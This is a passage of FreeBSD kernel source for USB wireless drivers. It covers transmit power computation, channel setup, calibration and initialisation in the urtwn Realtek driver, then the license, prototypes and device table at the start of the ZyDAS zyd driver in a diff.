RW(reg, R92C_TXAGC_B_CCK11, power[3]); urtwn_bb_write(sc, R92C_TXAGC_B_CCK11_A_CCK2_11, reg); } /* Write per-OFDM rate Tx power. */ urtwn_bb_write(sc, R92C_TXAGC_RATE18_06(chain), SM(R92C_TXAGC_RATE06, power[ 4]) | SM(R92C_TXAGC_RATE09, power[ 5]) | SM(R92C_TXAGC_RATE12, power[ 6]) | SM(R92C_TXAGC_RATE18, power[ 7])); urtwn_bb_write(sc, R92C_TXAGC_RATE54_24(chain), SM(R92C_TXAGC_RATE24, power[ 8]) | SM(R92C_TXAGC_RATE36, power[ 9]) | SM(R92C_TXAGC_RATE48, power[10]) | SM(R92C_TXAGC_RATE54, power[11])); /* Write per-MCS Tx power. 
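 * power[12] through power[27] hold MCS0-MCS15; four MCS rates are packed into each 32-bit TXAGC register below.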
*/ urtwn_bb_write(sc, R92C_TXAGC_MCS03_MCS00(chain), SM(R92C_TXAGC_MCS00, power[12]) | SM(R92C_TXAGC_MCS01, power[13]) | SM(R92C_TXAGC_MCS02, power[14]) | SM(R92C_TXAGC_MCS03, power[15])); urtwn_bb_write(sc, R92C_TXAGC_MCS07_MCS04(chain), SM(R92C_TXAGC_MCS04, power[16]) | SM(R92C_TXAGC_MCS05, power[17]) | SM(R92C_TXAGC_MCS06, power[18]) | SM(R92C_TXAGC_MCS07, power[19])); urtwn_bb_write(sc, R92C_TXAGC_MCS11_MCS08(chain), SM(R92C_TXAGC_MCS08, power[20]) | SM(R92C_TXAGC_MCS09, power[21]) | SM(R92C_TXAGC_MCS10, power[22]) | SM(R92C_TXAGC_MCS11, power[23])); urtwn_bb_write(sc, R92C_TXAGC_MCS15_MCS12(chain), SM(R92C_TXAGC_MCS12, power[24]) | SM(R92C_TXAGC_MCS13, power[25]) | SM(R92C_TXAGC_MCS14, power[26]) | SM(R92C_TXAGC_MCS15, power[27])); } void urtwn_get_txpower(struct urtwn_softc *sc, int chain, struct ieee80211_channel *c, struct ieee80211_channel *extc, uint16_t power[URTWN_RIDX_COUNT]) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; struct r92c_rom *rom = &sc->rom; uint16_t cckpow, ofdmpow, htpow, diff, max; const struct urtwn_txpwr *base; int ridx, chan, group; /* Determine channel group. */ chan = ieee80211_chan2ieee(ic, c); /* XXX center freq! */ if (chan <= 3) group = 0; else if (chan <= 9) group = 1; else group = 2; /* Get original Tx power based on board type and RF chain. */ if (!(sc->chip & URTWN_CHIP_92C)) { if (sc->board_type == R92C_BOARD_TYPE_HIGHPA) base = &rtl8188ru_txagc[chain]; else base = &rtl8192cu_txagc[chain]; } else base = &rtl8192cu_txagc[chain]; memset(power, 0, URTWN_RIDX_COUNT * sizeof(power[0])); if (sc->regulatory == 0) { for (ridx = 0; ridx <= 3; ridx++) power[ridx] = base->pwr[0][ridx]; } for (ridx = 4; ridx < URTWN_RIDX_COUNT; ridx++) { if (sc->regulatory == 3) { power[ridx] = base->pwr[0][ridx]; /* Apply vendor limits. */ if (extc != NULL) max = rom->ht40_max_pwr[group]; else max = rom->ht20_max_pwr[group]; max = (max >> (chain * 4)) & 0xf; if (power[ridx] > max) power[ridx] = max; } else if (sc->regulatory == 1) { if (extc == NULL) power[ridx] = base->pwr[group][ridx]; } else if (sc->regulatory != 2) power[ridx] = base->pwr[0][ridx]; } /* Compute per-CCK rate Tx power. */ cckpow = rom->cck_tx_pwr[chain][group]; for (ridx = 0; ridx <= 3; ridx++) { power[ridx] += cckpow; if (power[ridx] > R92C_MAX_TX_PWR) power[ridx] = R92C_MAX_TX_PWR; } htpow = rom->ht40_1s_tx_pwr[chain][group]; if (sc->ntxchains > 1) { /* Apply reduction for 2 spatial streams. */ diff = rom->ht40_2s_tx_pwr_diff[group]; diff = (diff >> (chain * 4)) & 0xf; htpow = (htpow > diff) ? htpow - diff : 0; } /* Compute per-OFDM rate Tx power. */ diff = rom->ofdm_tx_pwr_diff[group]; diff = (diff >> (chain * 4)) & 0xf; ofdmpow = htpow + diff; /* HT->OFDM correction. */ for (ridx = 4; ridx <= 11; ridx++) { power[ridx] += ofdmpow; if (power[ridx] > R92C_MAX_TX_PWR) power[ridx] = R92C_MAX_TX_PWR; } /* Compute per-MCS Tx power. */ if (extc == NULL) { diff = rom->ht20_tx_pwr_diff[group]; diff = (diff >> (chain * 4)) & 0xf; htpow += diff; /* HT40->HT20 correction. */ } for (ridx = 12; ridx <= 27; ridx++) { power[ridx] += htpow; if (power[ridx] > R92C_MAX_TX_PWR) power[ridx] = R92C_MAX_TX_PWR; } #ifdef URTWN_DEBUG if (urtwn_debug >= 4) { /* Dump per-rate Tx power values.
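 * Debug-only dump of every per-rate value (CCK, OFDM and MCS) computed above for this chain.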
*/ printf("Tx power for chain %d:\n", chain); for (ridx = 0; ridx < URTWN_RIDX_COUNT; ridx++) printf("Rate %d = %u\n", ridx, power[ridx]); } #endif } void urtwn_set_txpower(struct urtwn_softc *sc, struct ieee80211_channel *c, struct ieee80211_channel *extc) { uint16_t power[URTWN_RIDX_COUNT]; int i; for (i = 0; i < sc->ntxchains; i++) { /* Compute per-rate Tx power values. */ urtwn_get_txpower(sc, i, c, extc, power); /* Write per-rate Tx power values to hardware. */ urtwn_write_txpower(sc, i, power); } } static void urtwn_scan_start(struct ieee80211com *ic) { /* XXX do nothing? */ } static void urtwn_scan_end(struct ieee80211com *ic) { /* XXX do nothing? */ } static void urtwn_set_channel(struct ieee80211com *ic) { struct urtwn_softc *sc = ic->ic_ifp->if_softc; URTWN_LOCK(sc); urtwn_set_chan(sc, ic->ic_curchan, NULL); URTWN_UNLOCK(sc); } static void urtwn_update_mcast(struct ifnet *ifp) { /* XXX do nothing? */ } static void urtwn_set_chan(struct urtwn_softc *sc, struct ieee80211_channel *c, struct ieee80211_channel *extc) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; uint32_t reg; u_int chan; int i; chan = ieee80211_chan2ieee(ic, c); /* XXX center freq! */ if (chan == 0 || chan == IEEE80211_CHAN_ANY) { device_printf(sc->sc_dev, "%s: invalid channel %x\n", __func__, chan); return; } /* Set Tx power for this new channel. */ urtwn_set_txpower(sc, c, extc); for (i = 0; i < sc->nrxchains; i++) { urtwn_rf_write(sc, i, R92C_RF_CHNLBW, RW(sc->rf_chnlbw[i], R92C_RF_CHNLBW_CHNL, chan)); } #ifndef IEEE80211_NO_HT if (extc != NULL) { /* Is secondary channel below or above primary? */ int prichlo = c->ic_freq < extc->ic_freq; urtwn_write_1(sc, R92C_BWOPMODE, urtwn_read_1(sc, R92C_BWOPMODE) & ~R92C_BWOPMODE_20MHZ); reg = urtwn_read_1(sc, R92C_RRSR + 2); reg = (reg & ~0x6f) | (prichlo ? 1 : 2) << 5; urtwn_write_1(sc, R92C_RRSR + 2, reg); urtwn_bb_write(sc, R92C_FPGA0_RFMOD, urtwn_bb_read(sc, R92C_FPGA0_RFMOD) | R92C_RFMOD_40MHZ); urtwn_bb_write(sc, R92C_FPGA1_RFMOD, urtwn_bb_read(sc, R92C_FPGA1_RFMOD) | R92C_RFMOD_40MHZ); /* Set CCK side band. */ reg = urtwn_bb_read(sc, R92C_CCK0_SYSTEM); reg = (reg & ~0x00000010) | (prichlo ? 0 : 1) << 4; urtwn_bb_write(sc, R92C_CCK0_SYSTEM, reg); reg = urtwn_bb_read(sc, R92C_OFDM1_LSTF); reg = (reg & ~0x00000c00) | (prichlo ? 1 : 2) << 10; urtwn_bb_write(sc, R92C_OFDM1_LSTF, reg); urtwn_bb_write(sc, R92C_FPGA0_ANAPARAM2, urtwn_bb_read(sc, R92C_FPGA0_ANAPARAM2) & ~R92C_FPGA0_ANAPARAM2_CBW20); reg = urtwn_bb_read(sc, 0x818); reg = (reg & ~0x0c000000) | (prichlo ? 2 : 1) << 26; urtwn_bb_write(sc, 0x818, reg); /* Select 40MHz bandwidth. */ urtwn_rf_write(sc, 0, R92C_RF_CHNLBW, (sc->rf_chnlbw[0] & ~0xfff) | chan); } else #endif { urtwn_write_1(sc, R92C_BWOPMODE, urtwn_read_1(sc, R92C_BWOPMODE) | R92C_BWOPMODE_20MHZ); urtwn_bb_write(sc, R92C_FPGA0_RFMOD, urtwn_bb_read(sc, R92C_FPGA0_RFMOD) & ~R92C_RFMOD_40MHZ); urtwn_bb_write(sc, R92C_FPGA1_RFMOD, urtwn_bb_read(sc, R92C_FPGA1_RFMOD) & ~R92C_RFMOD_40MHZ); urtwn_bb_write(sc, R92C_FPGA0_ANAPARAM2, urtwn_bb_read(sc, R92C_FPGA0_ANAPARAM2) | R92C_FPGA0_ANAPARAM2_CBW20); /* Select 20MHz bandwidth. */ urtwn_rf_write(sc, 0, R92C_RF_CHNLBW, (sc->rf_chnlbw[0] & ~0xfff) | R92C_RF_CHNLBW_BW20 | chan); } } static void urtwn_iq_calib(struct urtwn_softc *sc) { /* TODO */ } static void urtwn_lc_calib(struct urtwn_softc *sc) { uint32_t rf_ac[2]; uint8_t txmode; int i; txmode = urtwn_read_1(sc, R92C_OFDM1_LSTF + 3); if ((txmode & 0x70) != 0) { /* Disable all continuous Tx. 
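 * Calibration is done with transmission quiesced: continuous Tx is stopped and the RF put in standby, or else all Tx queues are paused below.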
*/ urtwn_write_1(sc, R92C_OFDM1_LSTF + 3, txmode & ~0x70); /* Set RF mode to standby mode. */ for (i = 0; i < sc->nrxchains; i++) { rf_ac[i] = urtwn_rf_read(sc, i, R92C_RF_AC); urtwn_rf_write(sc, i, R92C_RF_AC, RW(rf_ac[i], R92C_RF_AC_MODE, R92C_RF_AC_MODE_STANDBY)); } } else { /* Block all Tx queues. */ urtwn_write_1(sc, R92C_TXPAUSE, 0xff); } /* Start calibration. */ urtwn_rf_write(sc, 0, R92C_RF_CHNLBW, urtwn_rf_read(sc, 0, R92C_RF_CHNLBW) | R92C_RF_CHNLBW_LCSTART); /* Give calibration the time to complete. */ usb_pause_mtx(&sc->sc_mtx, 100); /* Restore configuration. */ if ((txmode & 0x70) != 0) { /* Restore Tx mode. */ urtwn_write_1(sc, R92C_OFDM1_LSTF + 3, txmode); /* Restore RF mode. */ for (i = 0; i < sc->nrxchains; i++) urtwn_rf_write(sc, i, R92C_RF_AC, rf_ac[i]); } else { /* Unblock all Tx queues. */ urtwn_write_1(sc, R92C_TXPAUSE, 0x00); } } static void urtwn_init_locked(void *arg) { struct urtwn_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; uint32_t reg; int error; if (ifp->if_drv_flags & IFF_DRV_RUNNING) urtwn_stop_locked(ifp, 0); /* Init firmware commands ring. */ sc->fwcur = 0; /* Allocate Tx/Rx buffers. */ error = urtwn_alloc_rx_list(sc); if (error != 0) goto fail; error = urtwn_alloc_tx_list(sc); if (error != 0) goto fail; /* Power on adapter. */ error = urtwn_power_on(sc); if (error != 0) goto fail; /* Initialize DMA. */ error = urtwn_dma_init(sc); if (error != 0) goto fail; /* Set info size in Rx descriptors (in 64-bit words). */ urtwn_write_1(sc, R92C_RX_DRVINFO_SZ, 4); /* Init interrupts. */ urtwn_write_4(sc, R92C_HISR, 0xffffffff); urtwn_write_4(sc, R92C_HIMR, 0xffffffff); /* Set MAC address. */ urtwn_write_region_1(sc, R92C_MACID, IF_LLADDR(ifp), IEEE80211_ADDR_LEN); /* Set initial network type. */ reg = urtwn_read_4(sc, R92C_CR); reg = RW(reg, R92C_CR_NETTYPE, R92C_CR_NETTYPE_INFRA); urtwn_write_4(sc, R92C_CR, reg); urtwn_rxfilter_init(sc); reg = urtwn_read_4(sc, R92C_RRSR); reg = RW(reg, R92C_RRSR_RATE_BITMAP, R92C_RRSR_RATE_CCK_ONLY_1M); urtwn_write_4(sc, R92C_RRSR, reg); /* Set short/long retry limits. */ urtwn_write_2(sc, R92C_RL, SM(R92C_RL_SRL, 0x30) | SM(R92C_RL_LRL, 0x30)); /* Initialize EDCA parameters. */ urtwn_edca_init(sc); /* Setup rate fallback. */ urtwn_write_4(sc, R92C_DARFRC + 0, 0x00000000); urtwn_write_4(sc, R92C_DARFRC + 4, 0x10080404); urtwn_write_4(sc, R92C_RARFRC + 0, 0x04030201); urtwn_write_4(sc, R92C_RARFRC + 4, 0x08070605); urtwn_write_1(sc, R92C_FWHW_TXQ_CTRL, urtwn_read_1(sc, R92C_FWHW_TXQ_CTRL) | R92C_FWHW_TXQ_CTRL_AMPDU_RTY_NEW); /* Set ACK timeout. */ urtwn_write_1(sc, R92C_ACKTO, 0x40); /* Setup USB aggregation. */ reg = urtwn_read_4(sc, R92C_TDECTRL); reg = RW(reg, R92C_TDECTRL_BLK_DESC_NUM, 6); urtwn_write_4(sc, R92C_TDECTRL, reg); urtwn_write_1(sc, R92C_TRXDMA_CTRL, urtwn_read_1(sc, R92C_TRXDMA_CTRL) | R92C_TRXDMA_CTRL_RXDMA_AGG_EN); urtwn_write_1(sc, R92C_USB_SPECIAL_OPTION, urtwn_read_1(sc, R92C_USB_SPECIAL_OPTION) | R92C_USB_SPECIAL_OPTION_AGG_EN); urtwn_write_1(sc, R92C_RXDMA_AGG_PG_TH, 48); urtwn_write_1(sc, R92C_USB_DMA_AGG_TO, 4); urtwn_write_1(sc, R92C_USB_AGG_TH, 8); urtwn_write_1(sc, R92C_USB_AGG_TO, 6); /* Initialize beacon parameters. */ urtwn_write_2(sc, R92C_TBTT_PROHIBIT, 0x6404); urtwn_write_1(sc, R92C_DRVERLYINT, 0x05); urtwn_write_1(sc, R92C_BCNDMATIM, 0x02); urtwn_write_2(sc, R92C_BCNTCFG, 0x660f); /* Setup AMPDU aggregation. 
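 * AGGLEN_LMT below carries the per-MCS A-MPDU length limits (note the MCS7~0 annotation); AGGR_BREAK_TIME and the beacon registers follow.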
*/ urtwn_write_4(sc, R92C_AGGLEN_LMT, 0x99997631); /* MCS7~0 */ urtwn_write_1(sc, R92C_AGGR_BREAK_TIME, 0x16); urtwn_write_2(sc, 0x4ca, 0x0708); urtwn_write_1(sc, R92C_BCN_MAX_ERR, 0xff); urtwn_write_1(sc, R92C_BCN_CTRL, R92C_BCN_CTRL_DIS_TSF_UDT0); /* Load 8051 microcode. */ error = urtwn_load_firmware(sc); if (error != 0) goto fail; /* Initialize MAC/BB/RF blocks. */ urtwn_mac_init(sc); urtwn_bb_init(sc); urtwn_rf_init(sc); /* Turn CCK and OFDM blocks on. */ reg = urtwn_bb_read(sc, R92C_FPGA0_RFMOD); reg |= R92C_RFMOD_CCK_EN; urtwn_bb_write(sc, R92C_FPGA0_RFMOD, reg); reg = urtwn_bb_read(sc, R92C_FPGA0_RFMOD); reg |= R92C_RFMOD_OFDM_EN; urtwn_bb_write(sc, R92C_FPGA0_RFMOD, reg); /* Clear per-station keys table. */ urtwn_cam_init(sc); /* Enable hardware sequence numbering. */ urtwn_write_1(sc, R92C_HWSEQ_CTRL, 0xff); /* Perform LO and IQ calibrations. */ urtwn_iq_calib(sc); /* Perform LC calibration. */ urtwn_lc_calib(sc); /* Fix USB interference issue. */ urtwn_write_1(sc, 0xfe40, 0xe0); urtwn_write_1(sc, 0xfe41, 0x8d); urtwn_write_1(sc, 0xfe42, 0x80); urtwn_pa_bias_init(sc); /* Initialize GPIO setting. */ urtwn_write_1(sc, R92C_GPIO_MUXCFG, urtwn_read_1(sc, R92C_GPIO_MUXCFG) & ~R92C_GPIO_MUXCFG_ENBT); /* Fix for lower temperature. */ urtwn_write_1(sc, 0x15, 0xe9); usbd_transfer_start(sc->sc_xfer[URTWN_BULK_RX]); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; callout_reset(&sc->sc_watchdog_ch, hz, urtwn_watchdog, sc); fail: return; } static void urtwn_init(void *arg) { struct urtwn_softc *sc = arg; URTWN_LOCK(sc); urtwn_init_locked(arg); URTWN_UNLOCK(sc); } static void urtwn_stop_locked(struct ifnet *ifp, int disable) { struct urtwn_softc *sc = ifp->if_softc; (void)disable; ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); callout_stop(&sc->sc_watchdog_ch); urtwn_abort_xfers(sc); } static void urtwn_stop(struct ifnet *ifp, int disable) { struct urtwn_softc *sc = ifp->if_softc; URTWN_LOCK(sc); urtwn_stop_locked(ifp, disable); URTWN_UNLOCK(sc); } static void urtwn_abort_xfers(struct urtwn_softc *sc) { int i; URTWN_ASSERT_LOCKED(sc); /* abort any pending transfers */ for (i = 0; i < URTWN_N_TRANSFER; i++) usbd_transfer_stop(sc->sc_xfer[i]); } static int urtwn_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct urtwn_softc *sc = ifp->if_softc; struct urtwn_data *bf; /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { m_freem(m); ieee80211_free_node(ni); return (ENETDOWN); } URTWN_LOCK(sc); bf = urtwn_getbuf(sc); if (bf == NULL) { ieee80211_free_node(ni); m_freem(m); URTWN_UNLOCK(sc); return (ENOBUFS); } ifp->if_opackets++; if (urtwn_tx_start(sc, ni, m, bf) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, bf, next); URTWN_UNLOCK(sc); return (EIO); } URTWN_UNLOCK(sc); sc->sc_txtimer = 5; return (0); } static device_method_t urtwn_methods[] = { /* Device interface */ DEVMETHOD(device_probe, urtwn_match), DEVMETHOD(device_attach, urtwn_attach), DEVMETHOD(device_detach, urtwn_detach), { 0, 0 } }; static driver_t urtwn_driver = { "urtwn", urtwn_methods, sizeof(struct urtwn_softc) }; static devclass_t urtwn_devclass; DRIVER_MODULE(urtwn, uhub, urtwn_driver, urtwn_devclass, NULL, NULL); MODULE_DEPEND(urtwn, usb, 1, 1, 1); MODULE_DEPEND(urtwn, wlan, 1, 1, 1); MODULE_DEPEND(urtwn, firmware, 1, 1, 1); MODULE_VERSION(urtwn, 1); diff --git 
a/sys/dev/usb/wlan/if_zyd.c b/sys/dev/usb/wlan/if_zyd.c index 504c270b0d3d..def2550d0f37 100644 --- a/sys/dev/usb/wlan/if_zyd.c +++ b/sys/dev/usb/wlan/if_zyd.c @@ -1,2975 +1,2975 @@ /* $OpenBSD: if_zyd.c,v 1.52 2007/02/11 00:08:04 jsg Exp $ */ /* $NetBSD: if_zyd.c,v 1.7 2007/06/21 04:04:29 kiyohara Exp $ */ /* $FreeBSD$ */ /*- * Copyright (c) 2006 by Damien Bergamini * Copyright (c) 2006 by Florian Stoehr * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #include __FBSDID("$FreeBSD$"); /* * ZyDAS ZD1211/ZD1211B USB WLAN driver. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef INET #include #include #include #include #include #endif #include #include #include #include #include #include #include #include "usbdevs.h" #include #include #ifdef USB_DEBUG static int zyd_debug = 0; static SYSCTL_NODE(_hw_usb, OID_AUTO, zyd, CTLFLAG_RW, 0, "USB zyd"); SYSCTL_INT(_hw_usb_zyd, OID_AUTO, debug, CTLFLAG_RW, &zyd_debug, 0, "zyd debug level"); enum { ZYD_DEBUG_XMIT = 0x00000001, /* basic xmit operation */ ZYD_DEBUG_RECV = 0x00000002, /* basic recv operation */ ZYD_DEBUG_RESET = 0x00000004, /* reset processing */ ZYD_DEBUG_INIT = 0x00000008, /* device init */ ZYD_DEBUG_TX_PROC = 0x00000010, /* tx ISR proc */ ZYD_DEBUG_RX_PROC = 0x00000020, /* rx ISR proc */ ZYD_DEBUG_STATE = 0x00000040, /* 802.11 state transitions */ ZYD_DEBUG_STAT = 0x00000080, /* statistic */ ZYD_DEBUG_FW = 0x00000100, /* firmware */ ZYD_DEBUG_CMD = 0x00000200, /* fw commands */ ZYD_DEBUG_ANY = 0xffffffff }; #define DPRINTF(sc, m, fmt, ...) do { \ if (zyd_debug & (m)) \ printf("%s: " fmt, __func__, ## __VA_ARGS__); \ } while (0) #else #define DPRINTF(sc, m, fmt, ...) 
do { \ (void) sc; \ } while (0) #endif #define zyd_do_request(sc,req,data) \ usbd_do_request_flags((sc)->sc_udev, &(sc)->sc_mtx, req, data, 0, NULL, 5000) static device_probe_t zyd_match; static device_attach_t zyd_attach; static device_detach_t zyd_detach; static usb_callback_t zyd_intr_read_callback; static usb_callback_t zyd_intr_write_callback; static usb_callback_t zyd_bulk_read_callback; static usb_callback_t zyd_bulk_write_callback; static struct ieee80211vap *zyd_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void zyd_vap_delete(struct ieee80211vap *); static void zyd_tx_free(struct zyd_tx_data *, int); static void zyd_setup_tx_list(struct zyd_softc *); static void zyd_unsetup_tx_list(struct zyd_softc *); static int zyd_newstate(struct ieee80211vap *, enum ieee80211_state, int); static int zyd_cmd(struct zyd_softc *, uint16_t, const void *, int, void *, int, int); static int zyd_read16(struct zyd_softc *, uint16_t, uint16_t *); static int zyd_read32(struct zyd_softc *, uint16_t, uint32_t *); static int zyd_write16(struct zyd_softc *, uint16_t, uint16_t); static int zyd_write32(struct zyd_softc *, uint16_t, uint32_t); static int zyd_rfwrite(struct zyd_softc *, uint32_t); static int zyd_lock_phy(struct zyd_softc *); static int zyd_unlock_phy(struct zyd_softc *); static int zyd_rf_attach(struct zyd_softc *, uint8_t); static const char *zyd_rf_name(uint8_t); static int zyd_hw_init(struct zyd_softc *); static int zyd_read_pod(struct zyd_softc *); static int zyd_read_eeprom(struct zyd_softc *); static int zyd_get_macaddr(struct zyd_softc *); static int zyd_set_macaddr(struct zyd_softc *, const uint8_t *); static int zyd_set_bssid(struct zyd_softc *, const uint8_t *); static int zyd_switch_radio(struct zyd_softc *, int); static int zyd_set_led(struct zyd_softc *, int, int); static void zyd_set_multi(struct zyd_softc *); static void zyd_update_mcast(struct ifnet *); static int zyd_set_rxfilter(struct zyd_softc *); static void zyd_set_chan(struct zyd_softc *, struct ieee80211_channel *); static int zyd_set_beacon_interval(struct zyd_softc *, int); static void zyd_rx_data(struct usb_xfer *, int, uint16_t); static int zyd_tx_start(struct zyd_softc *, struct mbuf *, struct ieee80211_node *); static void zyd_start(struct ifnet *); static int zyd_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static int zyd_ioctl(struct ifnet *, u_long, caddr_t); static void zyd_init_locked(struct zyd_softc *); static void zyd_init(void *); static void zyd_stop(struct zyd_softc *); static int zyd_loadfirmware(struct zyd_softc *); static void zyd_scan_start(struct ieee80211com *); static void zyd_scan_end(struct ieee80211com *); static void zyd_set_channel(struct ieee80211com *); static int zyd_rfmd_init(struct zyd_rf *); static int zyd_rfmd_switch_radio(struct zyd_rf *, int); static int zyd_rfmd_set_channel(struct zyd_rf *, uint8_t); static int zyd_al2230_init(struct zyd_rf *); static int zyd_al2230_switch_radio(struct zyd_rf *, int); static int zyd_al2230_set_channel(struct zyd_rf *, uint8_t); static int zyd_al2230_set_channel_b(struct zyd_rf *, uint8_t); static int zyd_al2230_init_b(struct zyd_rf *); static int zyd_al7230B_init(struct zyd_rf *); static int zyd_al7230B_switch_radio(struct zyd_rf *, int); static int zyd_al7230B_set_channel(struct zyd_rf *, uint8_t); static int zyd_al2210_init(struct zyd_rf *); static int zyd_al2210_switch_radio(struct 
zyd_rf *, int); static int zyd_al2210_set_channel(struct zyd_rf *, uint8_t); static int zyd_gct_init(struct zyd_rf *); static int zyd_gct_switch_radio(struct zyd_rf *, int); static int zyd_gct_set_channel(struct zyd_rf *, uint8_t); static int zyd_gct_mode(struct zyd_rf *); static int zyd_gct_set_channel_synth(struct zyd_rf *, int, int); static int zyd_gct_write(struct zyd_rf *, uint16_t); static int zyd_gct_txgain(struct zyd_rf *, uint8_t); static int zyd_maxim2_init(struct zyd_rf *); static int zyd_maxim2_switch_radio(struct zyd_rf *, int); static int zyd_maxim2_set_channel(struct zyd_rf *, uint8_t); static const struct zyd_phy_pair zyd_def_phy[] = ZYD_DEF_PHY; static const struct zyd_phy_pair zyd_def_phyB[] = ZYD_DEF_PHYB; /* various supported device vendors/products */ #define ZYD_ZD1211 0 #define ZYD_ZD1211B 1 #define ZYD_ZD1211_DEV(v,p) \ { USB_VPI(USB_VENDOR_##v, USB_PRODUCT_##v##_##p, ZYD_ZD1211) } #define ZYD_ZD1211B_DEV(v,p) \ { USB_VPI(USB_VENDOR_##v, USB_PRODUCT_##v##_##p, ZYD_ZD1211B) } static const STRUCT_USB_HOST_ID zyd_devs[] = { /* ZYD_ZD1211 */ ZYD_ZD1211_DEV(3COM2, 3CRUSB10075), ZYD_ZD1211_DEV(ABOCOM, WL54), ZYD_ZD1211_DEV(ASUS, WL159G), ZYD_ZD1211_DEV(CYBERTAN, TG54USB), ZYD_ZD1211_DEV(DRAYTEK, VIGOR550), ZYD_ZD1211_DEV(PLANEX2, GWUS54GD), ZYD_ZD1211_DEV(PLANEX2, GWUS54GZL), ZYD_ZD1211_DEV(PLANEX3, GWUS54GZ), ZYD_ZD1211_DEV(PLANEX3, GWUS54MINI), ZYD_ZD1211_DEV(SAGEM, XG760A), ZYD_ZD1211_DEV(SENAO, NUB8301), ZYD_ZD1211_DEV(SITECOMEU, WL113), ZYD_ZD1211_DEV(SWEEX, ZD1211), ZYD_ZD1211_DEV(TEKRAM, QUICKWLAN), ZYD_ZD1211_DEV(TEKRAM, ZD1211_1), ZYD_ZD1211_DEV(TEKRAM, ZD1211_2), ZYD_ZD1211_DEV(TWINMOS, G240), ZYD_ZD1211_DEV(UMEDIA, ALL0298V2), ZYD_ZD1211_DEV(UMEDIA, TEW429UB_A), ZYD_ZD1211_DEV(UMEDIA, TEW429UB), ZYD_ZD1211_DEV(WISTRONNEWEB, UR055G), ZYD_ZD1211_DEV(ZCOM, ZD1211), ZYD_ZD1211_DEV(ZYDAS, ZD1211), ZYD_ZD1211_DEV(ZYXEL, AG225H), ZYD_ZD1211_DEV(ZYXEL, ZYAIRG220), ZYD_ZD1211_DEV(ZYXEL, G200V2), /* ZYD_ZD1211B */ ZYD_ZD1211B_DEV(ACCTON, SMCWUSBG_NF), ZYD_ZD1211B_DEV(ACCTON, SMCWUSBG), ZYD_ZD1211B_DEV(ACCTON, ZD1211B), ZYD_ZD1211B_DEV(ASUS, A9T_WIFI), ZYD_ZD1211B_DEV(BELKIN, F5D7050_V4000), ZYD_ZD1211B_DEV(BELKIN, ZD1211B), ZYD_ZD1211B_DEV(CISCOLINKSYS, WUSBF54G), ZYD_ZD1211B_DEV(FIBERLINE, WL430U), ZYD_ZD1211B_DEV(MELCO, KG54L), ZYD_ZD1211B_DEV(PHILIPS, SNU5600), ZYD_ZD1211B_DEV(PLANEX2, GW_US54GXS), ZYD_ZD1211B_DEV(SAGEM, XG76NA), ZYD_ZD1211B_DEV(SITECOMEU, ZD1211B), ZYD_ZD1211B_DEV(UMEDIA, TEW429UBC1), ZYD_ZD1211B_DEV(USR, USR5423), ZYD_ZD1211B_DEV(VTECH, ZD1211B), ZYD_ZD1211B_DEV(ZCOM, ZD1211B), ZYD_ZD1211B_DEV(ZYDAS, ZD1211B), ZYD_ZD1211B_DEV(ZYXEL, M202), ZYD_ZD1211B_DEV(ZYXEL, G202), ZYD_ZD1211B_DEV(ZYXEL, G220V2) }; static const struct usb_config zyd_config[ZYD_N_TRANSFER] = { [ZYD_BULK_WR] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_OUT, .bufsize = ZYD_MAX_TXBUFSZ, .flags = {.pipe_bof = 1,.force_short_xfer = 1,}, .callback = zyd_bulk_write_callback, .ep_index = 0, .timeout = 10000, /* 10 seconds */ }, [ZYD_BULK_RD] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_IN, .bufsize = ZYX_MAX_RXBUFSZ, .flags = {.pipe_bof = 1,.short_xfer_ok = 1,}, .callback = zyd_bulk_read_callback, .ep_index = 0, }, [ZYD_INTR_WR] = { .type = UE_BULK_INTR, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_OUT, .bufsize = sizeof(struct zyd_cmd), .flags = {.pipe_bof = 1,.force_short_xfer = 1,}, .callback = zyd_intr_write_callback, .timeout = 1000, /* 1 second */ .ep_index = 1, }, [ZYD_INTR_RD] = { .type = UE_INTERRUPT, .endpoint = UE_ADDR_ANY, .direction 
